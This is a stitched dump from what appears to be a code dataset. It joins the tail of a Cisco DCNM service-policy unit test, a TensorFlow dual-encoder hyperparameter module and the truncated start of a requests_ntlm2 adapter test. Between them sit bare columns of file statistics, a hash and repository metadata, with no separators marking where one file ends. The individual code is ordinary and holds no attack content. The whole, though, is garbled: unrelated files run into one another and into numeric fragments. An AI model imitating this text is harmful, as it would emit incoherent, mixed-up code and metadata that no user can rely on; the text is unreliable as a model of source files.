self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 1)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
self.assertEqual(len(result["response"]) , 1)
def test_dcnm_sp_query_with_service_node2 (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('query_with_node_name_sn1')
set_module_args(dict(state='query',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=False, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 1)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
self.assertEqual(len(result["response"]) , 2)
def test_dcnm_sp_query_no_mand_elems (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('query_no_mand_elems')
set_module_args(dict(state='query',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('node_name : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
| 50.105081
| 139
| 0.559033
| 9,478
| 86,782
| 4.731061
| 0.025955
| 0.079213
| 0.105618
| 0.111438
| 0.966303
| 0.96327
| 0.960148
| 0.955398
| 0.947347
| 0.940992
| 0
| 0.023679
| 0.346938
| 86,782
| 1,731
| 140
| 50.134027
| 0.76753
| 0.041068
| 0
| 0.85758
| 0
| 0
| 0.145847
| 0.056192
| 0
| 0
| 0
| 0
| 0.153139
| 1
| 0.029862
| false
| 0.003828
| 0.003828
| 0
| 0.035988
| 0.000766
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
df4532606e1a9ef2c21b36744633ef9d6ee06ca3
| 32,395
|
py
|
Python
|
dual_encoder/util/param_util.py
|
stevezheng23/dual_encoder_tf
|
953f3aea507f265ce21319d99fd3e9f9d4c06bec
|
[
"Apache-2.0"
] | 1
|
2019-03-20T03:25:45.000Z
|
2019-03-20T03:25:45.000Z
|
dual_encoder/util/param_util.py
|
stevezheng23/dual_encoder_tf
|
953f3aea507f265ce21319d99fd3e9f9d4c06bec
|
[
"Apache-2.0"
] | null | null | null |
dual_encoder/util/param_util.py
|
stevezheng23/dual_encoder_tf
|
953f3aea507f265ce21319d99fd3e9f9d4c06bec
|
[
"Apache-2.0"
] | 1
|
2021-09-30T17:07:24.000Z
|
2021-09-30T17:07:24.000Z
|
import argparse
import codecs
import json
import math
import os.path
import numpy as np
import tensorflow as tf
__all__ = ["create_default_hyperparams", "load_hyperparams",
"generate_search_lookup", "search_hyperparams", "create_hyperparams_file"]
def create_default_hyperparams(config_type):
"""create default hyperparameters"""
if config_type == "conv_enc":
hyperparams = tf.contrib.training.HParams(
data_train_dual_file="",
data_train_dual_file_type="",
data_eval_dual_file="",
data_eval_dual_file_type="",
data_src_embed_file="",
data_src_embed_full_file="",
data_src_word_max_length=300,
data_src_word_vocab_file="",
data_src_word_vocab_size=50000,
data_src_word_vocab_threshold=0,
data_src_word_unk="<unk>",
data_src_word_pad="<pad>",
data_src_char_max_length=16,
data_src_char_vocab_file="",
data_src_char_vocab_size=1000,
data_src_char_vocab_threshold=50,
data_src_char_unk="*",
data_src_char_pad="#",
data_trg_embed_file="",
data_trg_embed_full_file="",
data_trg_word_max_length=300,
data_trg_word_vocab_file="",
data_trg_word_vocab_size=50000,
data_trg_word_vocab_threshold=0,
data_trg_word_unk="<unk>",
data_trg_word_pad="<pad>",
data_trg_char_max_length=16,
data_trg_char_vocab_file="",
data_trg_char_vocab_size=1000,
data_trg_char_vocab_threshold=50,
data_trg_char_unk="*",
data_trg_char_pad="#",
data_share_vocab=False,
data_external_index_enable=False,
data_pipeline_mode="default",
data_num_parallel=4,
data_log_output_dir="",
data_result_output_dir="",
train_random_seed=100,
train_enable_shuffle=True,
train_shuffle_buffer_size=30000,
train_batch_size=32,
train_neg_num=15,
train_eval_batch_size=100,
train_eval_metric=["cp_auc@1", "precision@1"],
train_eval_detail_type="full",
train_num_epoch=3,
train_model_export_type="embedding",
train_model_version="",
train_model_output_dir="",
train_ckpt_output_dir="",
train_summary_output_dir="",
train_step_per_stat=10,
train_step_per_ckpt=1000,
train_step_per_eval=1000,
train_clip_norm=5.0,
train_enable_debugging=False,
train_loss_type="neg_sampling",
train_ema_enable=True,
train_ema_decay_rate=0.999,
train_ema_enable_debias=False,
train_ema_enable_dynamic_decay=False,
train_regularization_enable=False,
train_regularization_type="l2",
train_regularization_scale=3e-7,
train_optimizer_type="adam",
train_optimizer_learning_rate=0.001,
train_optimizer_warmup_enable=False,
train_optimizer_warmup_mode="exponential_warmup",
train_optimizer_warmup_rate=0.01,
train_optimizer_warmup_end_step=1000,
train_optimizer_decay_enable=False,
train_optimizer_decay_mode="exponential_decay",
train_optimizer_decay_rate=0.95,
train_optimizer_decay_step=1000,
train_optimizer_decay_start_step=10000,
train_optimizer_momentum_beta=0.9,
train_optimizer_rmsprop_beta=0.999,
train_optimizer_rmsprop_epsilon=1e-8,
train_optimizer_adadelta_rho=0.95,
train_optimizer_adadelta_epsilon=1e-8,
train_optimizer_adagrad_init_accumulator=0.1,
train_optimizer_adam_beta_1=0.9,
train_optimizer_adam_beta_2=0.999,
train_optimizer_adam_epsilon=1e-08,
model_type="conv_enc",
model_scope="dual_encoder",
model_representation_src_word_embed_dim=300,
model_representation_src_word_dropout=0.1,
model_representation_src_word_embed_pretrained=True,
model_representation_src_word_feat_trainable=False,
model_representation_src_word_feat_enable=True,
model_representation_src_char_embed_dim=16,
model_representation_src_char_unit_dim=100,
model_representation_src_char_window_size=[3,5],
model_representation_src_char_hidden_activation="relu",
model_representation_src_char_dropout=0.1,
model_representation_src_char_pooling_type="max",
model_representation_src_char_feat_trainable=True,
model_representation_src_char_feat_enable=True,
model_representation_src_fusion_type="highway",
model_representation_src_fusion_num_layer=2,
model_representation_src_fusion_unit_dim=128,
model_representation_src_fusion_hidden_activation="relu",
model_representation_src_fusion_dropout=0.2,
model_representation_src_fusion_trainable=True,
model_representation_trg_word_embed_dim=300,
model_representation_trg_word_dropout=0.1,
model_representation_trg_word_embed_pretrained=True,
model_representation_trg_word_feat_trainable=False,
model_representation_trg_word_feat_enable=True,
model_representation_trg_char_embed_dim=16,
model_representation_trg_char_unit_dim=100,
model_representation_trg_char_window_size=[3,5],
model_representation_trg_char_hidden_activation="relu",
model_representation_trg_char_dropout=0.1,
model_representation_trg_char_pooling_type="max",
model_representation_trg_char_feat_trainable=True,
model_representation_trg_char_feat_enable=True,
model_representation_trg_fusion_type="highway",
model_representation_trg_fusion_num_layer=2,
model_representation_trg_fusion_unit_dim=128,
model_representation_trg_fusion_hidden_activation="relu",
model_representation_trg_fusion_dropout=0.2,
model_representation_trg_fusion_trainable=True,
model_share_representation=False,
model_understanding_src_num_layer=2,
model_understanding_src_num_conv=2,
model_understanding_src_unit_dim=128,
model_understanding_src_window_size=[5],
model_understanding_src_hidden_activation="relu",
model_understanding_src_dropout=0.1,
model_understanding_src_layer_dropout=0.1,
model_understanding_src_trainable=True,
model_understanding_trg_num_layer=2,
model_understanding_trg_num_conv=2,
model_understanding_trg_unit_dim=128,
model_understanding_trg_window_size=[5],
model_understanding_trg_hidden_activation="relu",
model_understanding_trg_dropout=0.1,
model_understanding_trg_layer_dropout=0.1,
model_understanding_trg_trainable=True,
model_share_understanding=False,
model_interaction_src2trg_attention_dim=128,
model_interaction_src2trg_score_type="trilinear",
model_interaction_src2trg_dropout=0.0,
model_interaction_src2trg_attention_dropout=0.0,
model_interaction_src2trg_trainable=True,
model_interaction_src2trg_enable=False,
model_interaction_src_fusion_type="concate",
model_interaction_src_fusion_num_layer=1,
model_interaction_src_fusion_unit_dim=128,
model_interaction_src_fusion_hidden_activation="relu",
model_interaction_src_fusion_dropout=0.2,
model_interaction_src_fusion_trainable=True,
model_interaction_trg2src_attention_dim=128,
model_interaction_trg2src_score_type="trilinear",
model_interaction_trg2src_dropout=0.0,
model_interaction_trg2src_attention_dropout=0.0,
model_interaction_trg2src_trainable=True,
model_interaction_trg2src_enable=False,
model_interaction_trg_fusion_type="concate",
model_interaction_trg_fusion_num_layer=1,
model_interaction_trg_fusion_unit_dim=128,
model_interaction_trg_fusion_hidden_activation="relu",
model_interaction_trg_fusion_dropout=0.2,
model_interaction_trg_fusion_trainable=True,
model_share_interaction=False,
model_matching_score_type="cosine",
model_matching_pooling_type="max",
model_matching_num_layer=2,
model_matching_unit_dim=128,
model_matching_hidden_activation="relu",
model_matching_dropout=0.2,
model_matching_projection_dim=1,
model_matching_trainable=True,
device_num_gpus=1,
device_default_gpu_id=0,
device_log_device_placement=False,
device_allow_soft_placement=False,
device_allow_growth=False,
device_per_process_gpu_memory_fraction=0.8
)
elif config_type == "seq_enc":
hyperparams = tf.contrib.training.HParams(
data_train_dual_file="",
data_train_dual_file_type="",
data_eval_dual_file="",
data_eval_dual_file_type="",
data_src_embed_file="",
data_src_embed_full_file="",
data_src_word_max_length=300,
data_src_word_vocab_file="",
data_src_word_vocab_size=50000,
data_src_word_vocab_threshold=0,
data_src_word_unk="<unk>",
data_src_word_pad="<pad>",
data_src_char_max_length=16,
data_src_char_vocab_file="",
data_src_char_vocab_size=1000,
data_src_char_vocab_threshold=50,
data_src_char_unk="*",
data_src_char_pad="#",
data_trg_embed_file="",
data_trg_embed_full_file="",
data_trg_word_max_length=300,
data_trg_word_vocab_file="",
data_trg_word_vocab_size=50000,
data_trg_word_vocab_threshold=0,
data_trg_word_unk="<unk>",
data_trg_word_pad="<pad>",
data_trg_char_max_length=16,
data_trg_char_vocab_file="",
data_trg_char_vocab_size=1000,
data_trg_char_vocab_threshold=50,
data_trg_char_unk="*",
data_trg_char_pad="#",
data_share_vocab=False,
data_external_index_enable=False,
data_pipeline_mode="default",
data_num_parallel=4,
data_log_output_dir="",
data_result_output_dir="",
train_random_seed=100,
train_enable_shuffle=True,
train_shuffle_buffer_size=30000,
train_batch_size=32,
train_neg_num=15,
train_eval_batch_size=100,
train_eval_metric=["cp_auc@1", "precision@1"],
train_eval_detail_type="full",
train_num_epoch=3,
train_model_export_type="embedding",
train_model_version="",
train_model_output_dir="",
train_ckpt_output_dir="",
train_summary_output_dir="",
train_step_per_stat=10,
train_step_per_ckpt=1000,
train_step_per_eval=1000,
train_clip_norm=5.0,
train_enable_debugging=False,
train_loss_type="neg_sampling",
train_ema_enable=True,
train_ema_decay_rate=0.999,
train_ema_enable_debias=False,
train_ema_enable_dynamic_decay=False,
train_regularization_enable=False,
train_regularization_type="l2",
train_regularization_scale=3e-7,
train_optimizer_type="adam",
train_optimizer_learning_rate=0.001,
train_optimizer_warmup_enable=False,
train_optimizer_warmup_mode="exponential_warmup",
train_optimizer_warmup_rate=0.01,
train_optimizer_warmup_end_step=1000,
train_optimizer_decay_enable=False,
train_optimizer_decay_mode="exponential_decay",
train_optimizer_decay_rate=0.95,
train_optimizer_decay_step=1000,
train_optimizer_decay_start_step=10000,
train_optimizer_momentum_beta=0.9,
train_optimizer_rmsprop_beta=0.999,
train_optimizer_rmsprop_epsilon=1e-8,
train_optimizer_adadelta_rho=0.95,
train_optimizer_adadelta_epsilon=1e-8,
train_optimizer_adagrad_init_accumulator=0.1,
train_optimizer_adam_beta_1=0.9,
train_optimizer_adam_beta_2=0.999,
train_optimizer_adam_epsilon=1e-08,
model_type="seq_enc",
model_scope="dual_encoder",
model_representation_src_word_embed_dim=300,
model_representation_src_word_dropout=0.1,
model_representation_src_word_embed_pretrained=True,
model_representation_src_word_feat_trainable=False,
model_representation_src_word_feat_enable=True,
model_representation_src_char_embed_dim=16,
model_representation_src_char_unit_dim=100,
model_representation_src_char_window_size=[3,5],
model_representation_src_char_hidden_activation="relu",
model_representation_src_char_dropout=0.1,
model_representation_src_char_pooling_type="max",
model_representation_src_char_feat_trainable=True,
model_representation_src_char_feat_enable=True,
model_representation_src_fusion_type="highway",
model_representation_src_fusion_num_layer=2,
model_representation_src_fusion_unit_dim=128,
model_representation_src_fusion_hidden_activation="relu",
model_representation_src_fusion_dropout=0.2,
model_representation_src_fusion_trainable=True,
model_representation_trg_word_embed_dim=300,
model_representation_trg_word_dropout=0.1,
model_representation_trg_word_embed_pretrained=True,
model_representation_trg_word_feat_trainable=False,
model_representation_trg_word_feat_enable=True,
model_representation_trg_char_embed_dim=16,
model_representation_trg_char_unit_dim=100,
model_representation_trg_char_window_size=[3,5],
model_representation_trg_char_hidden_activation="relu",
model_representation_trg_char_dropout=0.1,
model_representation_trg_char_pooling_type="max",
model_representation_trg_char_feat_trainable=True,
model_representation_trg_char_feat_enable=True,
model_representation_trg_fusion_type="highway",
model_representation_trg_fusion_num_layer=2,
model_representation_trg_fusion_unit_dim=128,
model_representation_trg_fusion_hidden_activation="relu",
model_representation_trg_fusion_dropout=0.2,
model_representation_trg_fusion_trainable=True,
model_share_representation=False,
model_understanding_src_num_layer=2,
model_understanding_src_unit_dim=128,
model_understanding_src_cell_type="lstm",
model_understanding_src_hidden_activation="tanh",
model_understanding_src_dropout=0.1,
model_understanding_src_forget_bias=1.0,
model_understanding_src_residual_connect=False,
model_understanding_src_trainable=True,
model_understanding_trg_num_layer=2,
model_understanding_trg_unit_dim=128,
model_understanding_trg_cell_type="lstm",
model_understanding_trg_hidden_activation="tanh",
model_understanding_trg_dropout=0.1,
model_understanding_trg_forget_bias=1.0,
model_understanding_trg_residual_connect=False,
model_understanding_trg_trainable=True,
model_share_understanding=False,
model_interaction_src2trg_attention_dim=128,
model_interaction_src2trg_score_type="trilinear",
model_interaction_src2trg_dropout=0.0,
model_interaction_src2trg_attention_dropout=0.0,
model_interaction_src2trg_trainable=True,
model_interaction_src2trg_enable=False,
model_interaction_src_fusion_type="concate",
model_interaction_src_fusion_num_layer=1,
model_interaction_src_fusion_unit_dim=128,
model_interaction_src_fusion_hidden_activation="relu",
model_interaction_src_fusion_dropout=0.2,
model_interaction_src_fusion_trainable=True,
model_interaction_trg2src_attention_dim=128,
model_interaction_trg2src_score_type="trilinear",
model_interaction_trg2src_dropout=0.0,
model_interaction_trg2src_attention_dropout=0.0,
model_interaction_trg2src_trainable=True,
model_interaction_trg2src_enable=False,
model_interaction_trg_fusion_type="concate",
model_interaction_trg_fusion_num_layer=1,
model_interaction_trg_fusion_unit_dim=128,
model_interaction_trg_fusion_hidden_activation="relu",
model_interaction_trg_fusion_dropout=0.2,
model_interaction_trg_fusion_trainable=True,
model_share_interaction=False,
model_matching_score_type="cosine",
model_matching_pooling_type="max",
model_matching_num_layer=2,
model_matching_unit_dim=128,
model_matching_hidden_activation="relu",
model_matching_dropout=0.2,
model_matching_projection_dim=1,
model_matching_trainable=True,
device_num_gpus=1,
device_default_gpu_id=0,
device_log_device_placement=False,
device_allow_soft_placement=False,
device_allow_growth=False,
device_per_process_gpu_memory_fraction=0.8
)
elif config_type == "att_enc":
hyperparams = tf.contrib.training.HParams(
data_train_dual_file="",
data_train_dual_file_type="",
data_eval_dual_file="",
data_eval_dual_file_type="",
data_src_embed_file="",
data_src_embed_full_file="",
data_src_word_max_length=300,
data_src_word_vocab_file="",
data_src_word_vocab_size=50000,
data_src_word_vocab_threshold=0,
data_src_word_unk="<unk>",
data_src_word_pad="<pad>",
data_src_char_max_length=16,
data_src_char_vocab_file="",
data_src_char_vocab_size=1000,
data_src_char_vocab_threshold=50,
data_src_char_unk="*",
data_src_char_pad="#",
data_trg_embed_file="",
data_trg_embed_full_file="",
data_trg_word_max_length=300,
data_trg_word_vocab_file="",
data_trg_word_vocab_size=50000,
data_trg_word_vocab_threshold=0,
data_trg_word_unk="<unk>",
data_trg_word_pad="<pad>",
data_trg_char_max_length=16,
data_trg_char_vocab_file="",
data_trg_char_vocab_size=1000,
data_trg_char_vocab_threshold=50,
data_trg_char_unk="*",
data_trg_char_pad="#",
data_share_vocab=False,
data_external_index_enable=False,
data_pipeline_mode="default",
data_num_parallel=4,
data_log_output_dir="",
data_result_output_dir="",
train_random_seed=100,
train_enable_shuffle=True,
train_shuffle_buffer_size=30000,
train_batch_size=32,
train_neg_num=15,
train_eval_batch_size=100,
train_eval_metric=["cp_auc@1", "precision@1"],
train_eval_detail_type="full",
train_num_epoch=3,
train_model_export_type="embedding",
train_model_version="",
train_model_output_dir="",
train_ckpt_output_dir="",
train_summary_output_dir="",
train_step_per_stat=10,
train_step_per_ckpt=1000,
train_step_per_eval=1000,
train_clip_norm=5.0,
train_enable_debugging=False,
train_loss_type="neg_sampling",
train_ema_enable=True,
train_ema_decay_rate=0.999,
train_ema_enable_debias=False,
train_ema_enable_dynamic_decay=False,
train_regularization_enable=False,
train_regularization_type="l2",
train_regularization_scale=3e-7,
train_optimizer_type="adam",
train_optimizer_learning_rate=0.001,
train_optimizer_warmup_enable=False,
train_optimizer_warmup_mode="exponential_warmup",
train_optimizer_warmup_rate=0.01,
train_optimizer_warmup_end_step=1000,
train_optimizer_decay_enable=False,
train_optimizer_decay_mode="exponential_decay",
train_optimizer_decay_rate=0.95,
train_optimizer_decay_step=1000,
train_optimizer_decay_start_step=10000,
train_optimizer_momentum_beta=0.9,
train_optimizer_rmsprop_beta=0.999,
train_optimizer_rmsprop_epsilon=1e-8,
train_optimizer_adadelta_rho=0.95,
train_optimizer_adadelta_epsilon=1e-8,
train_optimizer_adagrad_init_accumulator=0.1,
train_optimizer_adam_beta_1=0.9,
train_optimizer_adam_beta_2=0.999,
train_optimizer_adam_epsilon=1e-08,
model_type="att_enc",
model_scope="dual_encoder",
model_representation_src_word_embed_dim=300,
model_representation_src_word_dropout=0.1,
model_representation_src_word_embed_pretrained=True,
model_representation_src_word_feat_trainable=False,
model_representation_src_word_feat_enable=True,
model_representation_src_char_embed_dim=16,
model_representation_src_char_unit_dim=100,
model_representation_src_char_window_size=[3,5],
model_representation_src_char_hidden_activation="relu",
model_representation_src_char_dropout=0.1,
model_representation_src_char_pooling_type="max",
model_representation_src_char_feat_trainable=True,
model_representation_src_char_feat_enable=True,
model_representation_src_fusion_type="highway",
model_representation_src_fusion_num_layer=2,
model_representation_src_fusion_unit_dim=128,
model_representation_src_fusion_hidden_activation="relu",
model_representation_src_fusion_dropout=0.2,
model_representation_src_fusion_trainable=True,
model_representation_trg_word_embed_dim=300,
model_representation_trg_word_dropout=0.1,
model_representation_trg_word_embed_pretrained=True,
model_representation_trg_word_feat_trainable=False,
model_representation_trg_word_feat_enable=True,
model_representation_trg_char_embed_dim=16,
model_representation_trg_char_unit_dim=100,
model_representation_trg_char_window_size=[3,5],
model_representation_trg_char_hidden_activation="relu",
model_representation_trg_char_dropout=0.1,
model_representation_trg_char_pooling_type="max",
model_representation_trg_char_feat_trainable=True,
model_representation_trg_char_feat_enable=True,
model_representation_trg_fusion_type="highway",
model_representation_trg_fusion_num_layer=2,
model_representation_trg_fusion_unit_dim=128,
model_representation_trg_fusion_hidden_activation="relu",
model_representation_trg_fusion_dropout=0.2,
model_representation_trg_fusion_trainable=True,
model_share_representation=False,
model_understanding_src_num_layer=2,
model_understanding_src_num_head=8,
model_understanding_src_unit_dim=128,
model_understanding_src_hidden_activation="relu",
model_understanding_src_dropout=0.1,
model_understanding_src_attention_dropout=0.0,
model_understanding_src_layer_dropout=0.1,
model_understanding_src_trainable=True,
model_understanding_trg_num_layer=2,
model_understanding_trg_num_head=8,
model_understanding_trg_unit_dim=128,
model_understanding_trg_hidden_activation="relu",
model_understanding_trg_dropout=0.1,
model_understanding_trg_attention_dropout=0.0,
model_understanding_trg_layer_dropout=0.1,
model_understanding_trg_trainable=True,
model_share_understanding=False,
model_interaction_src2trg_attention_dim=128,
model_interaction_src2trg_score_type="trilinear",
model_interaction_src2trg_dropout=0.0,
model_interaction_src2trg_attention_dropout=0.0,
model_interaction_src2trg_trainable=True,
model_interaction_src2trg_enable=False,
model_interaction_src_fusion_type="concate",
model_interaction_src_fusion_num_layer=1,
model_interaction_src_fusion_unit_dim=128,
model_interaction_src_fusion_hidden_activation="relu",
model_interaction_src_fusion_dropout=0.2,
model_interaction_src_fusion_trainable=True,
model_interaction_trg2src_attention_dim=128,
model_interaction_trg2src_score_type="trilinear",
model_interaction_trg2src_dropout=0.0,
model_interaction_trg2src_attention_dropout=0.0,
model_interaction_trg2src_trainable=True,
model_interaction_trg2src_enable=False,
model_interaction_trg_fusion_type="concate",
model_interaction_trg_fusion_num_layer=1,
model_interaction_trg_fusion_unit_dim=128,
model_interaction_trg_fusion_hidden_activation="relu",
model_interaction_trg_fusion_dropout=0.2,
model_interaction_trg_fusion_trainable=True,
model_share_interaction=False,
model_matching_score_type="cosine",
model_matching_pooling_type="max",
model_matching_num_layer=2,
model_matching_unit_dim=128,
model_matching_hidden_activation="relu",
model_matching_dropout=0.2,
model_matching_projection_dim=1,
model_matching_trainable=True,
device_num_gpus=1,
device_default_gpu_id=0,
device_log_device_placement=False,
device_allow_soft_placement=False,
device_allow_growth=False,
device_per_process_gpu_memory_fraction=0.8
)
else:
raise ValueError("unsupported config type {0}".format(config_type))
return hyperparams
def load_hyperparams(config_file):
"""load hyperparameters from config file"""
if tf.gfile.Exists(config_file):
with codecs.getreader("utf-8")(tf.gfile.GFile(config_file, "rb")) as file:
hyperparams_dict = json.load(file)
hyperparams = create_default_hyperparams(hyperparams_dict["model_type"])
hyperparams.override_from_dict(hyperparams_dict)
return hyperparams
else:
raise FileNotFoundError("config file not found")
def generate_search_lookup(search,
search_lookup=None):
search_lookup = search_lookup if search_lookup else {}
search_type = search["stype"]
data_type = search["dtype"]
if search_type == "uniform":
range_start = search["range"][0]
range_end = search["range"][1]
if data_type == "int":
search_sample = np.random.randint(range_start, range_end)
elif data_type == "float":
search_sample = (range_end - range_start) * np.random.random_sample() + range_start
else:
raise ValueError("unsupported data type {0}".format(data_type))
elif search_type == "log":
range_start = math.log(search["range"][0], 10)
range_end = math.log(search["range"][1], 10)
if data_type == "float":
search_sample = math.pow(10, (range_end - range_start) * np.random.random_sample() + range_start)
else:
raise ValueError("unsupported data type {0}".format(data_type))
elif search_type == "discrete":
search_set = search["set"]
search_index = np.random.choice(len(search_set))
search_sample = search_set[search_index]
elif search_type == "lookup":
search_key = search["key"]
if search_key in search_lookup:
search_sample = search_lookup[search_key]
else:
raise ValueError("search key {0} doesn't exist in look-up table".format(search_key))
else:
raise ValueError("unsupported search type {0}".format(search_type))
data_scale = search["scale"] if "scale" in search else 1.0
data_shift = search["shift"] if "shift" in search else 0.0
if data_type == "int":
search_sample = int(data_scale * search_sample + data_shift)
elif data_type == "float":
search_sample = float(data_scale * search_sample + data_shift)
elif data_type == "string":
search_sample = str(search_sample)
elif data_type == "boolean":
search_sample = bool(search_sample)
elif data_type == "list":
search_sample = list(search_sample)
else:
raise ValueError("unsupported data type {0}".format(data_type))
return search_sample
def search_hyperparams(hyperparams,
config_file,
num_group,
random_seed):
"""search hyperparameters based on search config"""
if tf.gfile.Exists(config_file):
with codecs.getreader("utf-8")(tf.gfile.GFile(config_file, "rb")) as file:
hyperparams_group = []
np.random.seed(random_seed)
search_setting = json.load(file)
hyperparams_search_setting = search_setting["hyperparams"]
variables_search_setting = search_setting["variables"]
for i in range(num_group):
variables_search_lookup = {}
for key in variables_search_setting.keys():
variables_search = variables_search_setting[key]
variables_search_lookup[key] = generate_search_lookup(variables_search)
hyperparams_search_lookup = {}
for key in hyperparams_search_setting.keys():
hyperparams_search = hyperparams_search_setting[key]
hyperparams_search_lookup[key] = generate_search_lookup(hyperparams_search, variables_search_lookup)
hyperparams_sample = tf.contrib.training.HParams(hyperparams.to_proto())
hyperparams_sample.override_from_dict(hyperparams_search_lookup)
hyperparams_group.append(hyperparams_sample)
return hyperparams_group
else:
raise FileNotFoundError("config file not found")
def create_hyperparams_file(hyperparams_group, config_dir):
"""create config files from groups of hyperparameters"""
if not tf.gfile.Exists(config_dir):
tf.gfile.MakeDirs(config_dir)
for i in range(len(hyperparams_group)):
config_file = os.path.join(config_dir, "config_hyperparams_{0}.json".format(i))
with codecs.getwriter("utf-8")(tf.gfile.GFile(config_file, "w")) as file:
hyperparam_dict = hyperparams_group[i].values()
hyperparams_json = json.dumps(hyperparam_dict, indent=4)
file.write(hyperparams_json)
| 47.56975
| 120
| 0.669517
| 3,752
| 32,395
| 5.212154
| 0.06903
| 0.110759
| 0.064124
| 0.03196
| 0.880804
| 0.862651
| 0.849253
| 0.847924
| 0.843117
| 0.830436
| 0
| 0.029896
| 0.263806
| 32,395
| 680
| 121
| 47.639706
| 0.790096
| 0.005093
| 0
| 0.837879
| 1
| 0
| 0.038592
| 0.003043
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007576
| false
| 0
| 0.010606
| 0
| 0.024242
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
df93d8da8d891bd1f013cb87b3a0b95af24b419e
| 7,145
|
py
|
Python
|
tests/unit/test_adapters.py
|
jkugler/requests-ntlm2
|
d5cc3a39b228fb2f3d95275101cfbff17aeb8e07
|
[
"ISC"
] | null | null | null |
tests/unit/test_adapters.py
|
jkugler/requests-ntlm2
|
d5cc3a39b228fb2f3d95275101cfbff17aeb8e07
|
[
"ISC"
] | null | null | null |
tests/unit/test_adapters.py
|
jkugler/requests-ntlm2
|
d5cc3a39b228fb2f3d95275101cfbff17aeb8e07
|
[
"ISC"
] | null | null | null |
import unittest
import mock
import requests.adapters
import requests.sessions
from requests.packages.urllib3.connection import HTTPConnection, HTTPSConnection
import requests_ntlm2.adapters
import requests_ntlm2.connection
class TestHttpProxyAdapter(unittest.TestCase):
def test_init(self):
adapter = requests_ntlm2.adapters.HttpProxyAdapter()
self.assertIsInstance(adapter, requests_ntlm2.adapters.HttpProxyAdapter)
self.assertIsInstance(adapter, requests.adapters.HTTPAdapter)
def test__add_host_header(self):
adapter = requests_ntlm2.adapters.HttpProxyAdapter()
request = requests.Request(url="http://github.com:80")
self.assertIsNone(request.headers.get("Host"))
adapter._add_host_header(request)
self.assertIsNotNone(request.headers.get("Host"))
self.assertEqual(request.headers["Host"], "github.com")
request = requests.Request(url="https://github.com:443")
self.assertIsNone(request.headers.get("Host"))
adapter._add_host_header(request)
self.assertIsNone(request.headers.get("Host"))
def test__add_host_header__already_added(self):
adapter = requests_ntlm2.adapters.HttpProxyAdapter()
request = requests.Request(url="http://github.com:80")
request.headers["Host"] = "github.com:123"
adapter._add_host_header(request)
self.assertEqual(
request.headers.get("Host"),
"github.com"
)
request = requests.Request(url="http://github.com:8080")
request.headers["Host"] = "github.com:123"
adapter._add_host_header(request)
self.assertEqual(
request.headers.get("Host"),
"github.com:8080"
)
request = requests.Request(url="https://github.com:8080")
request.headers["Host"] = "github.com:123"
adapter._add_host_header(request)
self.assertIsNone(request.headers.get("Host"))
request = requests.Request(url="https://github.com:8080")
request.headers["Host"] = "github.com:8080"
adapter._add_host_header(request)
self.assertEqual(request.headers.get("Host"), "github.com:8080")
def test__is_valid_host_header(self):
adapter = requests_ntlm2.adapters.HttpProxyAdapter()
request = requests.Request()
self.assertFalse(adapter._is_valid_host_header(request))
request.url = "https://google.com:443"
request.headers["Host"] = "google.com:443"
self.assertTrue(adapter._is_valid_host_header(request))
request.url = "https://google.com:8080"
self.assertFalse(adapter._is_valid_host_header(request))
def test__remove_host_header(self):
adapter = requests_ntlm2.adapters.HttpProxyAdapter()
request = requests.Request()
self.assertIsNone(adapter._remove_host_header(request))
self.assertIsNone(request.headers.get("Host"))
request.headers["Host"] = "google.com:443"
self.assertIsNone(adapter._remove_host_header(request))
self.assertIsNone(request.headers.get("Host"))
@mock.patch("requests_ntlm2.adapters.HttpProxyAdapter._add_host_header")
def test_add_headers(self, mock_add_host_header):
adapter = requests_ntlm2.adapters.HttpProxyAdapter()
request = requests.Request(url="http://github.com:80")
self.assertIsNone(adapter.add_headers(request))
mock_add_host_header.assert_called_once_with(request)
class TestHttpNtlmAdapter(unittest.TestCase):
@mock.patch("requests_ntlm2.adapters.HttpNtlmAdapter._teardown")
@mock.patch("requests_ntlm2.adapters.HttpNtlmAdapter._setup")
def test_init(self, mock_setup, mock_teardown):
adapter = requests_ntlm2.adapters.HttpNtlmAdapter("username", "password")
self.assertIsInstance(adapter, requests_ntlm2.adapters.HttpNtlmAdapter)
self.assertIsInstance(adapter, requests_ntlm2.adapters.HttpProxyAdapter)
self.assertIsInstance(adapter, requests.adapters.HTTPAdapter)
mock_setup.assert_called_once_with("username", "password", 3, False)
mock_teardown.assert_not_called()
@mock.patch("requests_ntlm2.adapters.HttpNtlmAdapter._teardown")
@mock.patch("requests_ntlm2.adapters.HttpNtlmAdapter._setup")
def test_init__strict_mode(self, mock_setup, mock_teardown):
adapter = requests_ntlm2.adapters.HttpNtlmAdapter(
"username",
"password",
